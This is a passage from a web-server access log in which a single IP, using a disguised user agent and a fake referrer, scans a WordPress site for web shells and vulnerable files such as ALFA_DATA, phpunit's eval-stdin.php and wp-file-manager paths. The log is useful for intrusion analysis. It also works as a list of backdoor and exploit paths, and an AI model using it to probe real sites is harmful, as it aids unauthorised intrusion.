SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:01 -0400] "GET /wp-includes/rest-api/fields/cache/ HTTP/1.1" 301 265 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:01 -0400] "GET /wp-content/uploads/2023/ HTTP/1.1" 301 255 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:01 -0400] "GET /wp-includes/Requests/Text/ HTTP/1.1" 301 257 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:02 -0400] "GET /wp-includes/SimplePie/ HTTP/1.1" 301 253 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:02 -0400] "GET /wp-includes/rest-api/fields/cache/ HTTP/1.1" 301 265 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:02 -0400] "GET /wp-includes/theme-compat/wp-aespa.php HTTP/1.1" 301 268 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:03 -0400] "GET /wp-content/themes/mTheme-Unus/css/css.php HTTP/1.1" 301 272 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:03 -0400] "GET /wp-content/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 292 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:03 -0400] "GET /wp-content/themes/fiestaresidences/download.php HTTP/1.1" 301 278 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:04 -0400] "GET /wp-content/themes/konzept/includes/uploadify/upload.php HTTP/1.1" 301 286 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:04 -0400] "GET /wp-content/plugins/wp-file-manager/lib/php/1975.php HTTP/1.1" 301 282 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:05 -0400] "GET /wp-content/plugins/dos2unix/dos2unix.php HTTP/1.1" 301 271 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:05 -0400] "GET /wp-content/plugins/wpyii2/wpyii2.php HTTP/1.1" 301 267 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:05 -0400] "GET /simple.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:06 -0400] "GET /link.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:06 -0400] "GET /shell20211028.php HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:06 -0400] "GET /.well-known/ HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:07 -0400] "GET /index.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:07 -0400] "GET /.well-known/acme-challenge/ HTTP/1.1" 301 258 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:07 -0400] "GET /ALFA_DATA/ HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:08 -0400] "GET /ALFA_DATA/alfacgiapi/ HTTP/1.1" 301 252 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:08 -0400] "GET /css/ HTTP/1.1" 301 235 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:08 -0400] "GET /wp-admin/css/colors/ HTTP/1.1" 301 251 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:09 -0400] "GET /wp-admin/css/colors/blue/ HTTP/1.1" 301 256 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:09 -0400] "GET /wp-admin/network/ HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:09 -0400] "GET /wp-content/ALFA_DATA/alfacgiapi/ HTTP/1.1" 301 263 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:10 -0400] "GET /wp-content/ HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:10 -0400] "GET /wp-content/patior/ HTTP/1.1" 301 249 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:10 -0400] "GET /wp-admin/maint/moon.php HTTP/1.1" 301 254 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:11 -0400] "GET /.well-known/acme-challenge/moon.php HTTP/1.1" 301 266 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:11 -0400] "GET /.well-known/pki-validation/atomlib.php HTTP/1.1" 404 - "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:11 -0400] "GET /wp-admin/css/colors/blue/atomlib.php HTTP/1.1" 301 267 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:11 -0400] "GET /wp-includes/Requests/atomlib.php HTTP/1.1" 301 263 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:12 -0400] "GET /.well-known/acme-challenge/atomlib.php HTTP/1.1" 301 269 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:12 -0400] "GET /wp-content/plugins/anttt/simple.php HTTP/1.1" 301 266 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:13 -0400] "GET /wp-content/plugins/TOPXOH/wDR.php HTTP/1.1" 301 264 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:13 -0400] "GET /wp-content/plugins/wordpresss3cll/up.php HTTP/1.1" 301 271 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:13 -0400] "GET /.well-known/admin.php HTTP/1.1" 301 252 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:14 -0400] "GET /.well-known/acme-challenge/wp-signup.php HTTP/1.1" 301 271 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:14 -0400] "GET /wp-content/plugins/linkpreview/db.php?u HTTP/1.1" 301 270 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:14 -0400] "GET /wp-content/themes/pridmag/db.php?u HTTP/1.1" 301 265 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:15 -0400] "GET /wp-includes/block-supports/themes.php HTTP/1.1" 301 268 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:15 -0400] "GET /wp-admin/images/themes.php HTTP/1.1" 301 257 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:15 -0400] "GET /wp-includes/js/themes.php HTTP/1.1" 301 256 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:16 -0400] "GET /wp-includes/pomo/themes.php HTTP/1.1" 301 258 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:16 -0400] "GET /wp-content/themes.php HTTP/1.1" 301 252 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:17 -0400] "GET /wp-includes/css/themes.php%20 HTTP/1.1" 301 260 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:17 -0400] "GET /wp-admin/js/themes.php HTTP/1.1" 301 253 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:17 -0400] "GET /wp-includes/rest-api/themes.php HTTP/1.1" 301 262 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:18 -0400] "GET /wp-admin/maint/themes.php HTTP/1.1" 301 256 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:18 -0400] "GET /wp-includes/Requests/themes.php HTTP/1.1" 301 262 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:18 -0400] "GET /wp-content/fonts/themes.php HTTP/1.1" 301 258 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:19 -0400] "GET /wp-content/themes/themes.php HTTP/1.1" 301 259 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:19 -0400] "GET /wp-includes/themes.php HTTP/1.1" 301 253 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:19 -0400] "GET /wp-content/backups-dup-lite/themes.php HTTP/1.1" 301 269 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:20 -0400] "GET /wp-content/uploads/themes.php HTTP/1.1" 301 260 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:20 -0400] "GET /wp-includes/theme-compat/themes.php HTTP/1.1" 301 266 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:20 -0400] "GET /wp-content/updraft/themes.php HTTP/1.1" 301 260 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:21 -0400] "GET /css/themes.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:21 -0400] "GET /wp-admin/includes/themes.php HTTP/1.1" 301 259 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:22 -0400] "GET /wp-includes/certificates/themes.php HTTP/1.1" 301 266 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:22 -0400] "GET /wp-content/plugins/yyobang/mar.php HTTP/1.1" 301 265 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:22 -0400] "GET /wp-content/plugins/press/wp-class.php HTTP/1.1" 301 268 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:23 -0400] "GET /wp-includes/Requests/Text/admin.php HTTP/1.1" 301 266 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:23 -0400] "GET /fm1.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:23 -0400] "GET /wp-content/themes/finley/min.php HTTP/1.1" 301 263 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:23 -0400] "GET /wp-head.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:24 -0400] "GET /.well-known/index.php HTTP/1.1" 301 252 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:24 -0400] "GET /goods.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:25 -0400] "GET /function/function.php HTTP/1.1" 301 252 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:25 -0400] "GET /index/function.php HTTP/1.1" 301 249 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:25 -0400] "GET /users.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:25 -0400] "GET /classwithtostring.php HTTP/1.1" 301 252 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:26 -0400] "GET /alfanew.PHP7 HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:26 -0400] "GET /ms.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:27 -0400] "GET /msl.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:27 -0400] "GET /plugin.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:27 -0400] "GET /wp-configs.php?p= HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:28 -0400] "GET /content.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:28 -0400] "GET /obfs.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:28 -0400] "GET /options-reading.php HTTP/1.1" 301 250 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:29 -0400] "GET /ms-sites.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:29 -0400] "GET /edit-form-advanced.php HTTP/1.1" 301 253 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:29 -0400] "GET /wp-includes/js/tinymce/skins/lightgray/img/index.php?p= HTTP/1.1" 301 286 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:30 -0400] "GET /admin.php?p= HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:30 -0400] "GET /radio.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:30 -0400] "GET /themes.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:31 -0400] "GET /wp-content/plugins/w0rdpr3ssnew/about.phpp HTTP/1.1" 301 273 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:31 -0400] "GET /wp-content/plugins/w0rdpr3ssnew/wp-login.php HTTP/1.1" 301 275 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:31 -0400] "GET 